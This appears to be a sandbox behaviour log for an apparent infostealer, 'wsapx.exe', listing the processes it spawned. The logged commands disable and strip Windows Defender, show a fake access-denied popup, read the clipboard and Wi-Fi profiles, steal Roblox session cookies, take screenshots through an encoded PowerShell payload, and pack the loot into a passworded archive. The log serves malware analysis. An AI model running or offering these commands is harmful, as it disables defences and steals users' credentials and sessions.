Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\bALb7.zip" *"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\wsapx.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES226F.tmp" "c:\Users\user\AppData\Local\Temp\uses4c50\CSCF61F15A833E5414089F1F2D7C06D86CA.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\bALb7.zip" *
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\wsapx.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Section loaded: python3.dll	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Section loaded: libffi-8.dll	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Section loaded: libcrypto-3.dll	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Section loaded: sqlite3.dll	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Section loaded: libssl-3.dll	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
